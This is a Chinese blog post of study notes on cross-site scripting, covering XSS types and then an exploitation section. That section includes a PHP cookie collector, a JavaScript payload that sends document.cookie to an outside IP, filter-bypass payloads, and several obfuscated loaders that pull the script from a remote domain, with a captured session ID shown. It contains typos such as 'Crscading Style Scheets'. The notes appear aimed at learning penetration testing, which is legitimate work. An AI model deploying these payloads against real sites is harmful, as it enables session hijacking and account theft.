XSS漏洞学习

最新推荐文章于 2024-09-20 20:59:18 发布
最新推荐文章于 2024-09-20 20:59:18 发布
阅读量286 收藏
点赞数
分类专栏: 渗透测试学习笔记 文章标签: xss 学习 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rmc131/article/details/127724306
版权

什么是XSS漏洞

XSS漏洞,跨站脚本漏洞(Crscading Style Scheets,CSS),允许恶意用户将代码植入到Web网站,供其他用户访问,其他用户访问到有恶意代码的网页就产生了XSS攻击。

危害

盗取账户,控制企业数据,盗窃资料,非法转账,强制发送电子邮件,网站挂马

分类

反射型

非持久化,需要欺骗用户自己点击链接出发XSS代码

存储型

持久化,恶意代码存储在服务器中,例如在个人信息发表或文章发表等地方加入代码,没有过滤或者过滤不严就会导致代码进入存储到服务器中,用户访问时就会触发。

dom型

DOM,Domcument Object Model,一个平台和语言都中立的接口,可以使用程序和脚本能够动态的访问和更新文档的内容、结构已经样式。

DOM型XSS本质时一种特护类型的反射型XSS,时基于DOM文档对象的一种漏洞,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。使用js脚本对文档的对象进行编辑从而修改页面内容

document.referer属性

window.name属性

location属性

innerHTML属性

document.write属性

一般的都会进行url编码,浏览器也带有XSS过滤器

XSS利用

xss.php

<?php
@ini_set('display_errors',1);
$str = $_GET['joke'];
$filePath = "joke.php";
$handler = fopen($filePath,"a");
fwrite($handler,$str);
fclose($handler);
?>

xss.js

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://192.168.0.133/xss.php?joke='+encodeURIComponent(document.cookie);

XSS绕过

大小写绕过

http://target_sys.com/xss/xss04.php?name=<Script>alert(1)</Script>

属性多余

http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1)</sc</script>ript>

转换标签

http://target_sys.com/xss/xss06.php?name=<img onerror=alert(1) src=a>

禁用alert

http://target_sys.com/xss/xss07.php?name=<img onerror="confirm(1)" src=a>

js输出

http://target_sys.com/xss/xss08.php?name=moon";alert(1);//

js过滤输出

http://target_sys.com/xss/xss09.php?name=moon';alert($a);//

dom输出

hash属性是一个可读可写的字符串,是URL的锚部分(从#开始的部分)

location.hash.substring(1):从#开始截取之后的字符

http://target_sys.com/xss/xss10.php?name=moon#<script>alert(1)</script>

仅限IE浏览器(不进行url编码)

urlcss

http://target_sys.com/xss/xss11.php/%22%20onsubmit=%22alert(1)

过滤特殊字符

php开启gpc后单引号,双引号,NULL字符都会加上反斜线//

过滤大于小于号

http://target_sys.com/xss/xss12.php/' onmouseover = 'javascript:alert(1);'

加载payload

<script src="http://www.rickc131.com/xss.js"></script>

成功后可以在joke.php看到

PHPSESSID=fg00p1uutd9r8n5snhsl6utj55

使用XSS平台可直接使用成熟的代码

标准script加载

<script src="http://www.rickc131.com/xss.js"></script>

<script src="//www.rickc131.com/xss.js"></script>

img

<img src=x onerror=createElement('script');body.appendChild(s);s.src='http://www.rickc131.com/xss.js';>

字符拼接

<script>z='dcoument.'</script>
<script>z=z+'write'</script>
<script>z=z+'<script'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://www.'</script>
<script>z=z+'rickc131'</script>
<script>z=z+'.com/x'</script>
<script>z=z+'ss.js><sc'</script>
<script>z=z+'ript'</script>
<script>z=z+'eval(z)'</script>

jquery加载

<scritp src="http://code.jquery.com/jquery-1.9.1.min.js"></scritp>
<script>$.getscript("//www.rickc131.com/xss.js")</script>
RICKC131
关注
专栏目录
Jquery XSS漏洞(CVE-2020-11022)
jammny
02-04 2万+
漏洞详情 jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞分析 在html()方
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2652
xss学习笔记
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
XSS漏洞详解
apple_74953689的博客
07-26 558
XSS类型存储型反射型DOM型触发过程黑客构造XSS脚本后正常用户访问携带XSS脚本的页面正常用户访问携带XSS脚本的URL正常用户访问携带XSS脚本的URL数据存储数据库URLURL谁来输出后端web应用程序后端web应用程序前端Javascript输出位置HTTP响应中HTTP响应中动态构造的DOM节点是否持久是否否W3C提出的CSP是一个HTTP头部,允许网站所有者定义哪些内容可以被加载到页面中。
2024年最全webstorm的安装及基本配置,2024最新物联网嵌入式开发高频精选面试题分享
2401_85015025的博客
05-14 521
择“License server”,然后在输入框中输入 License server address 为:http://hb5.s.osidea.cc:1017(有可能不能用,自己可以百度搜一下最新的)点击”Activate”按钮。人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**各种配置 可以根据自己的需求自行配置。7、开始基本配置 主要在。
jQuery-XSS漏洞(CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
2401_85013983的博客
05-14 733
【代码】jQuery-XSS漏洞(CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现。
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5461
jQuery导致的XSS跨站漏洞
xss漏洞学习小结,详不详细你说了算
MSB_WLAQ的博客
10-09 871
xss漏洞小结 一、初识XSS 1、什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 coo.
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
zz12345600354的博客
04-23 1066
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
jQuery XSS漏洞学习
weixin_43459870的博客
01-03 1万+
jQuery基础信息 jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 jQuery是一个JavaScript UI框架,它为许多DOM...
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
一纸荒芜的博客
10-31 1万+
jquery-xss漏洞复现
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
jquery xss验证代码
08-13
jquery xss验证代码,以txt打开,修改http://xxx/jquery.js,保存后加载有问题的jquery,可以出现弹窗
深入解析jQuery-XSS漏洞:安全防护与技术应用
最新发布
gitblog_06578的博客
09-20 1075
深入解析jQuery-XSS漏洞:安全防护与技术应用 jQuery-XSS漏洞CVE-2020-11022CVE-2020-11023 项目地址: https://gitcode.com/Resource-Bundle-Coll...
Web安全-JQuery框架XSS漏洞浅析
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
jQuery最新xss漏洞浅析、复现、修复
qq_29365787的博客
06-08 1万+
jQuery最新xss漏洞浅析、复现、修复 1、xss漏洞的形成和危害 形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是 应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执
jQuery XSS漏洞原因查找及解决方案
热门推荐
Galadridel的博客
06-11 2万+
测试网站是否存在此XSS跨站漏洞: 以google浏览器为例,打开要测试的网站,在Console窗口输入: $("element[attribute='<img src=123123 onerror=alert(123)>'"); 回车之后会出现弹窗,说明存在XSS跨站漏洞 解决方案:升级jquery版本1.10.2以上 升级之后如果还未修复,可能是其他的js包引起的,jqu...
任何使用jQuery Mobile网站中都存在一个尚未修复的XSS漏洞
weixin_33811539的博客
08-01 811
概述 根据国外媒体的最新报道,谷歌公司的安全工程师Eduardo Vela在jQuery Mobile框架中发现了一个安全漏洞,这个漏洞将会让所有使用了jQuery Mobile的网站暴露于跨站脚本攻击风险之下。 安全客小百科:jQuery Mobile jQuery Mobile项目(jQuery框架中的一个组件)是一个基于HTML5的开发框架...
xss漏洞学习实习收获: 学会了xss的原理的绕过方法 实习反思:
06-21
4. **检测与修复**:学习了如何使用工具(如OWASP ZAP、Burp Suite)检测XSS漏洞,并了解如何在代码层面进行修复。 5. **编码实践**:通过实际项目经验,应用这些知识在代码审查和安全测试中,提高了漏洞识别能力。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值